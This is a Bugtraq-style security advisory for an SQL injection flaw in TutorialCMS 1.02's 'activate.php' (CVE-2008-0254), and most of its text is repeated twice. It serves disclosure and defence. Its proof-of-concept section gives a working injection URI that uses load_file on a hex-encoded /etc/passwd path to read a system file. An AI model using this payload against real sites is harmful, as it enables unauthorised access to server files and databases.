TutorialCMS 'activate.php' SQL Injection Vulnerability
BID:27263
Info
TutorialCMS 'activate.php' SQL Injection Vulnerability
| Bugtraq ID: | 27263 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0254 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | ka0x is credited with the discovery of this vulnerability. |
| Vulnerable: |
WavelinkMedia TutorialCMS 1.02 |
| Not Vulnerable: | |
Discussion
TutorialCMS 'activate.php' SQL Injection Vulnerability
TutorialCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects TutorialCMS 1.02; other versions may also be vulnerable.
TutorialCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects TutorialCMS 1.02; other versions may also be vulnerable.
Exploit / POC
TutorialCMS 'activate.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*
Solution / Fix
References
TutorialCMS 'activate.php' SQL Injection Vulnerability
References:
References:
- TutorialCMS Homepage (WavelinkMedia)